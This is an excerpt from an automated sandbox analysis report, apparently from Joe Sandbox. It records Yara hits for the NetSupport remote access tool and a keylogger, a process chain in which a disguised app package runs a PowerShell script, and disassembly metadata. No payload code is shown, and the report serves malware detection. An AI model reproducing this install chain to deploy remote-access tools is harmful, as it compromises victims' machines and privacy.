                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.2526275885.000000000270C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.2542110346.0000000005AA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.2526275885.0000000002700000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.2540155172.0000000005A6C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.2487651963.0000000000602000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.2496684032.0000000000827000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.2544309699.0000000005AE4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\netsupport\client\client32.exe, Author: Joe Security
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                • Detection: 0%, Virustotal, Browse
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:35
                                                                                                                Start time:16:59:57
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                Imagebase:0x7ff64d050000
                                                                                                                File size:71'680 bytes
                                                                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:36
                                                                                                                Start time:16:59:59
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe" -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca
                                                                                                                Imagebase:0x7ff6f1be0000
                                                                                                                File size:2'483'712 bytes
                                                                                                                MD5 hash:A313FDADDB051A471645685386471EE2
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:38
                                                                                                                Start time:16:59:59
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe" /InvokerPRAID: App GroupPolicy
                                                                                                                Imagebase:0x7ff72f0d0000
                                                                                                                File size:293'376 bytes
                                                                                                                MD5 hash:2FEB69B26AB8966F050BA56641E8438A
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:39
                                                                                                                Start time:17:00:15
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe"
                                                                                                                Imagebase:0x7ff6c3640000
                                                                                                                File size:379'312 bytes
                                                                                                                MD5 hash:C55F8E39801444DEBA32F5B94B5F1EB8
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:40
                                                                                                                Start time:17:00:15
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"PsfRunDll64.exe"
                                                                                                                Imagebase:0x7ff695d40000
                                                                                                                File size:118'704 bytes
                                                                                                                MD5 hash:8466F69926A22670DCF6515A4FC3C054
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:41
                                                                                                                Start time:17:00:15
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'"
                                                                                                                Imagebase:0x7ff711290000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:42
                                                                                                                Start time:17:00:15
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff772470000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:43
                                                                                                                Start time:17:00:17
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1
                                                                                                                Imagebase:0x7ff711290000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                Disassembly

                                                                                                                Reset < >

                                                                                                                  Executed Functions

                                                                                                                  Function 00007FF6C365AC28 Relevance: 4.6, APIs: 3, Instructions: 121COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1750207852.00007FF6C365A000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6C365A000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ff6c365a000_PsfLauncher64.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1666786595-0
                                                                                                                  • Opcode ID: 19875d533f4ac2c43f27f94d2277efbfeeab3d7115a8d459110bfb280ed655da
                                                                                                                  • Instruction ID: c12617c819254b7cb5481e479b15c5289b6873162478eb66296797ee45781e46
                                                                                                                  • Opcode Fuzzy Hash: 19875d533f4ac2c43f27f94d2277efbfeeab3d7115a8d459110bfb280ed655da
                                                                                                                  • Instruction Fuzzy Hash: A5418E20A0C2068AFB66BF3AD457AB932D1AF55302F100539E4CEEB2D3DE2C6805A751
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF6C365AB44 Relevance: .1, Instructions: 62COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1750207852.00007FF6C365A000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6C365A000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ff6c365a000_PsfLauncher64.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 96c74e1e0dbeb617bde60a25e4beb2c6241c5db145c8aeac8e58c1cee0606da2
                                                                                                                  • Instruction ID: 7357b4b41e5b703cef658d9d6a434adb39612fe040b0d3aca4880be3e8ca2037
                                                                                                                  • Opcode Fuzzy Hash: 96c74e1e0dbeb617bde60a25e4beb2c6241c5db145c8aeac8e58c1cee0606da2
                                                                                                                  • Instruction Fuzzy Hash: 0311BC10E1C10B82FA187EB38857AFD31A59F50386F440474EAD9FB1C3ED6DA84063A2
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF6C365A884 Relevance: .0, Instructions: 29COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1750207852.00007FF6C365A000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6C365A000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ff6c365a000_PsfLauncher64.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4f34546cbe6a87d54a16ce7b6152f2452906cc9768ad5084a12dad45389c5db4
                                                                                                                  • Instruction ID: 4351f6a3366b17d3b07c334e4aca1b48df0440250e6c53571e4de5ef5b53dc12
                                                                                                                  • Opcode Fuzzy Hash: 4f34546cbe6a87d54a16ce7b6152f2452906cc9768ad5084a12dad45389c5db4
                                                                                                                  • Instruction Fuzzy Hash: 3DE04F00A2990F0AF6993FBB889797860809F04253F541934E4EEE11D3FC1DA8517301
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Executed Functions

                                                                                                                  Function 00007FF695D41130 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.1748750008.00007FF695D41000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF695D41000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ff695d41000_PsfRunDll64.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Initialize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2538663250-0
                                                                                                                  • Opcode ID: 4b5772668ec87ec97671e5f7c3550c1486df12dc04b6af15680e0079c3f3bc95
                                                                                                                  • Instruction ID: de24e8cbfd397bb49c46e4ed5ee5da509d83c219fd941ec34c50f4d2e9589ee8
                                                                                                                  • Opcode Fuzzy Hash: 4b5772668ec87ec97671e5f7c3550c1486df12dc04b6af15680e0079c3f3bc95
                                                                                                                  • Instruction Fuzzy Hash: F3117714E0D14786FA747BF159462BD11D1CF42A85F4426B4E86ED71C3EE2CAC4C826A
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:2.5%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:0%
                                                                                                                  Total number of Nodes:9
                                                                                                                  Total number of Limit Nodes:0
                                                                                                                  execution_graph 38417 7ff9baf38a50 38419 7ff9baf38a59 IdentifyCodeAuthzLevelW 38417->38419 38420 7ff9baf4bb2e 38419->38420 38409 7ff9baf3941e 38410 7ff9baf3942d GetThreadPreferredUILanguages 38409->38410 38412 7ff9baf3952a 38410->38412 38413 7ff9baf38221 38414 7ff9baf3822f GetFileAttributesW 38413->38414 38416 7ff9baf382d6 38414->38416

                                                                                                                  Executed Functions

                                                                                                                  Function 00007FF9BAF311D8 Relevance: 3.1, Strings: 2, Instructions: 636COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 22 7ff9baf311d8-7ff9baf311e4 24 7ff9baf3121b-7ff9baf312a5 22->24 25 7ff9baf311e6-7ff9baf3121a 22->25 34 7ff9baf31320 24->34 35 7ff9baf312a7-7ff9baf312e4 24->35 25->24 37 7ff9baf31321-7ff9baf313e4 34->37 42 7ff9baf3131a-7ff9baf3131f 35->42 43 7ff9baf312e6-7ff9baf31319 35->43 58 7ff9baf31419-7ff9baf314e4 37->58 59 7ff9baf313e6-7ff9baf31418 37->59 42->34 42->37 43->42 78 7ff9baf31518-7ff9baf3156f 58->78 79 7ff9baf314e6-7ff9baf31515 58->79 59->58 89 7ff9baf315b9-7ff9baf315d6 78->89 90 7ff9baf31571-7ff9baf315a9 call 7ff9baf30150 call 7ff9baf30448 call 7ff9baf305a8 78->90 79->78 94 7ff9baf31647-7ff9baf31650 89->94 95 7ff9baf315d8-7ff9baf315da 89->95 105 7ff9baf315ae-7ff9baf315b0 90->105 99 7ff9baf31656 94->99 98 7ff9baf315dc 95->98 95->99 102 7ff9baf315de-7ff9baf315ee 98->102 103 7ff9baf31623-7ff9baf31636 98->103 101 7ff9baf31658-7ff9baf3165e 99->101 106 7ff9baf31660-7ff9baf31663 101->106 107 7ff9baf316b7-7ff9baf316df call 7ff9baf30768 call 7ff9baf307f0 101->107 119 7ff9baf315f0-7ff9baf3160a 102->119 120 7ff9baf3161d-7ff9baf3161e 102->120 113 7ff9baf31637-7ff9baf31645 103->113 109 7ff9baf31621-7ff9baf31622 105->109 110 7ff9baf315b2-7ff9baf315b6 105->110 111 7ff9baf316e4-7ff9baf3170b call 7ff9baf307f8 106->111 112 7ff9baf31665-7ff9baf31676 106->112 107->111 109->103 110->113 115 7ff9baf315b8 110->115 137 7ff9baf31719 111->137 138 7ff9baf3170d-7ff9baf31717 111->138 116 7ff9baf3167b-7ff9baf31689 112->116 113->94 115->89 121 7ff9baf3168b-7ff9baf316b6 116->121 119->116 132 7ff9baf3160c-7ff9baf3160f 119->132 120->109 121->107 132->121 136 7ff9baf31611 132->136 136->101 139 7ff9baf31613-7ff9baf31618 call 7ff9baf30598 136->139 140 7ff9baf3171e-7ff9baf31720 137->140 138->140 139->120 142 7ff9baf31722-7ff9baf3173f call 7ff9baf30d18 140->142 143 7ff9baf31757-7ff9baf31764 call 7ff9baf30308 140->143 149 7ff9baf31744-7ff9baf31755 142->149 148 7ff9baf31766-7ff9baf3176b call 7ff9baf309e8 143->148 151 7ff9baf31770-7ff9baf3177d call 7ff9baf309f0 148->151 149->148 155 7ff9baf31799-7ff9baf3179d 151->155 156 7ff9baf3177f-7ff9baf31797 151->156 157 7ff9baf3179f-7ff9baf317d5 call 7ff9baf30880 call 7ff9baf318d6 155->157 156->157
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2427705825.00007FF9BAF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9baf30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 2O_I$3O_I
                                                                                                                  • API String ID: 0-1954759320
                                                                                                                  • Opcode ID: 2267c1f48ef5b4773b3a59175b5c1b2338e2ab034e455c5ee87957b471e29351
                                                                                                                  • Instruction ID: 7d8e1e19a61ac1beca4cd2c0d183b38c604b693d1938569853053de5ffde6db2
                                                                                                                  • Opcode Fuzzy Hash: 2267c1f48ef5b4773b3a59175b5c1b2338e2ab034e455c5ee87957b471e29351
                                                                                                                  • Instruction Fuzzy Hash: 2F221126D0EA810BEB55DB6DA8553B92ED1FF92312F0801FBC589C71DBED68BA05C344
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BAF41B8E Relevance: 2.6, Instructions: 2554COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2427705825.00007FF9BAF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9baf30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a17b0120023818f51065f3afd70ee4123cacd0280639121bf9a19d3c76d369cc
                                                                                                                  • Instruction ID: 44a100daa7306049b8b3c895e9c753738a73a45188d6a803cda43d06c6550d5f
                                                                                                                  • Opcode Fuzzy Hash: a17b0120023818f51065f3afd70ee4123cacd0280639121bf9a19d3c76d369cc
                                                                                                                  • Instruction Fuzzy Hash: C5236270909A498FE795DB28C855BE9BBF1EF99300F0001FAD04DD76A2DE786A84CF51
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3CE7A9 Relevance: .6, Instructions: 560COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1143 7ff9bb3ce7a9-7ff9bb3ce7ad 1144 7ff9bb3ce7b5 1143->1144 1145 7ff9bb3ce7af 1143->1145 1146 7ff9bb3ce7b7 1144->1146 1147 7ff9bb3ce7b8-7ff9bb3ce7c9 1144->1147 1145->1144 1146->1147 1148 7ff9bb3ce7cb 1147->1148 1149 7ff9bb3ce7cc-7ff9bb3ce846 1147->1149 1148->1149 1153 7ff9bb3ce858 1149->1153 1154 7ff9bb3ce848-7ff9bb3ce856 1149->1154 1155 7ff9bb3ce85d-7ff9bb3ce85f 1153->1155 1154->1155 1156 7ff9bb3ce871-7ff9bb3ce88f 1155->1156 1157 7ff9bb3ce861-7ff9bb3ce86f 1155->1157 1161 7ff9bb3ce894-7ff9bb3ce8f4 1156->1161 1157->1156 1167 7ff9bb3ce8f6-7ff9bb3ce930 1161->1167 1168 7ff9bb3ce96b-7ff9bb3ce99c 1161->1168 1177 7ff9bb3ce932 1167->1177 1178 7ff9bb3ce93c-7ff9bb3ce969 1167->1178 1172 7ff9bb3ceb15-7ff9bb3ceb2b call 7ff9bb3ced0f 1168->1172 1173 7ff9bb3ce9a2-7ff9bb3ce9f6 1168->1173 1182 7ff9bb3ceb98-7ff9bb3cebec 1172->1182 1183 7ff9bb3ceb2d-7ff9bb3ceb38 1172->1183 1191 7ff9bb3ceadd-7ff9bb3ceaeb call 7ff9bb3cecc8 1173->1191 1192 7ff9bb3ce9fc-7ff9bb3cea1b 1173->1192 1177->1178 1178->1167 1178->1168 1214 7ff9bb3cec1d-7ff9bb3cec54 1182->1214 1215 7ff9bb3cebee-7ff9bb3cec16 1182->1215 1187 7ff9bb3ceb91-7ff9bb3ceb96 1183->1187 1188 7ff9bb3ceb3a-7ff9bb3ceb5b 1183->1188 1187->1182 1187->1183 1188->1187 1202 7ff9bb3ceb5d-7ff9bb3ceb72 1188->1202 1203 7ff9bb3ceaf7-7ff9bb3ceb0f 1191->1203 1204 7ff9bb3ceaed-7ff9bb3ceaf5 1191->1204 1199 7ff9bb3cea24 1192->1199 1200 7ff9bb3cea1d-7ff9bb3cea22 1192->1200 1205 7ff9bb3cea26-7ff9bb3cea28 1199->1205 1200->1205 1216 7ff9bb3ceb74-7ff9bb3ceb79 1202->1216 1217 7ff9bb3ceb7b 1202->1217 1203->1172 1203->1173 1204->1172 1204->1203 1207 7ff9bb3cea2e-7ff9bb3cea38 1205->1207 1208 7ff9bb3ceabf-7ff9bb3cead7 1205->1208 1209 7ff9bb3cea4a-7ff9bb3cea5a 1207->1209 1210 7ff9bb3cea3a-7ff9bb3cea48 1207->1210 1208->1191 1208->1192 1223 7ff9bb3cea5d-7ff9bb3cea65 1209->1223 1210->1209 1210->1223 1225 7ff9bb3cec56-7ff9bb3cec72 1214->1225 1226 7ff9bb3cecb8-7ff9bb3cecc7 1214->1226 1215->1214 1221 7ff9bb3ceb7d-7ff9bb3ceb7f 1216->1221 1217->1221 1221->1187 1224 7ff9bb3ceb81-7ff9bb3ceb8a 1221->1224 1227 7ff9bb3cea96-7ff9bb3cea99 1223->1227 1228 7ff9bb3cea67-7ff9bb3cea87 1223->1228 1224->1187 1233 7ff9bb3cec74 1225->1233 1234 7ff9bb3cec7e-7ff9bb3cecb6 1225->1234 1227->1208 1232 7ff9bb3cea9b-7ff9bb3ceaaa 1227->1232 1228->1227 1236 7ff9bb3cea89-7ff9bb3cea8e 1228->1236 1232->1208 1239 7ff9bb3ceaac-7ff9bb3ceab8 1232->1239 1233->1234 1234->1225 1234->1226 1236->1227 1239->1208
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3bb3e68045ffb77cf19489cd15c62c9dae142398f63666658ac4f6a34efaf239
                                                                                                                  • Instruction ID: 32e2817f06420f997d3e58a6879e2f5234865c0eb49c6dbf698672ee920b9836
                                                                                                                  • Opcode Fuzzy Hash: 3bb3e68045ffb77cf19489cd15c62c9dae142398f63666658ac4f6a34efaf239
                                                                                                                  • Instruction Fuzzy Hash: 4C02CC31A0AA5A8BEB98DF5CC8617B977E2FF99304F044079D44EC72D2DE68B8528740
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB1A0BAD Relevance: 5.1, Strings: 4, Instructions: 127COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2441953396.00007FF9BB1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB1A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb1a0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: '_^]$'_^`$'_^c$8(_^
                                                                                                                  • API String ID: 0-1215133575
                                                                                                                  • Opcode ID: c5fdac5c9a36391574d152419879c7f8fe99fd09e449cd595f341a5e8839a6b9
                                                                                                                  • Instruction ID: 98c09334dee85f3efb195f6cd059f8e5b8d1b00900343eb31b473f2d3557df35
                                                                                                                  • Opcode Fuzzy Hash: c5fdac5c9a36391574d152419879c7f8fe99fd09e449cd595f341a5e8839a6b9
                                                                                                                  • Instruction Fuzzy Hash: DB318A56F0DA991FE360EB2C68962F56BD1FF8626871801F7D09DCA0D3EC187C068644
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BAF38A50 Relevance: 1.7, APIs: 1, Instructions: 172COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2427705825.00007FF9BAF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9baf30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 46537b3d25655ebc3449dffefa24eb7190db4dab5ff83c13fe0c35696eb65f6f
                                                                                                                  • Instruction ID: 12244684033f811ece3d6e32e4ebe9ceeabd4db849f533d35835990751c92512
                                                                                                                  • Opcode Fuzzy Hash: 46537b3d25655ebc3449dffefa24eb7190db4dab5ff83c13fe0c35696eb65f6f
                                                                                                                  • Instruction Fuzzy Hash: E651C331908A1C8FDBA9DB19D8457E9B7F1FB59311F0042EAD44DE3252CE70AE858F81
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BAF3941E Relevance: 1.7, APIs: 1, Instructions: 152threadCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 675 7ff9baf3941e-7ff9baf3942b 676 7ff9baf3942d-7ff9baf39435 675->676 677 7ff9baf39436-7ff9baf39447 675->677 676->677 678 7ff9baf39449-7ff9baf39451 677->678 679 7ff9baf39452-7ff9baf394df 677->679 678->679 682 7ff9baf394e9-7ff9baf39528 GetThreadPreferredUILanguages 679->682 683 7ff9baf394e1-7ff9baf394e6 679->683 684 7ff9baf3952a 682->684 685 7ff9baf39530-7ff9baf3955b 682->685 683->682 684->685
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2427705825.00007FF9BAF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9baf30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LanguagesPreferredThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 842807343-0
                                                                                                                  • Opcode ID: 44c4223fe9a719bcc3b5a9c0734be2163254906886ba20e728af4dbb4a701ab3
                                                                                                                  • Instruction ID: c15b6bdfc40b31669dc89c3ef1cee18ccb272bbf7b1285c3c9d69b581493876a
                                                                                                                  • Opcode Fuzzy Hash: 44c4223fe9a719bcc3b5a9c0734be2163254906886ba20e728af4dbb4a701ab3
                                                                                                                  • Instruction Fuzzy Hash: 8841043090CA489FDB199B68D8457E9BBF0EB56321F0442AFD049D3192DF74B856CB91
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BAF38221 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 686 7ff9baf38221-7ff9baf3822d 687 7ff9baf3822f 686->687 688 7ff9baf38231-7ff9baf3826a 686->688 687->688 689 7ff9baf38271-7ff9baf38298 687->689 688->689 691 7ff9baf3829a-7ff9baf3829f 689->691 692 7ff9baf382a2-7ff9baf382d4 GetFileAttributesW 689->692 691->692 693 7ff9baf382dc-7ff9baf38301 692->693 694 7ff9baf382d6 692->694 694->693
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2427705825.00007FF9BAF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9baf30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
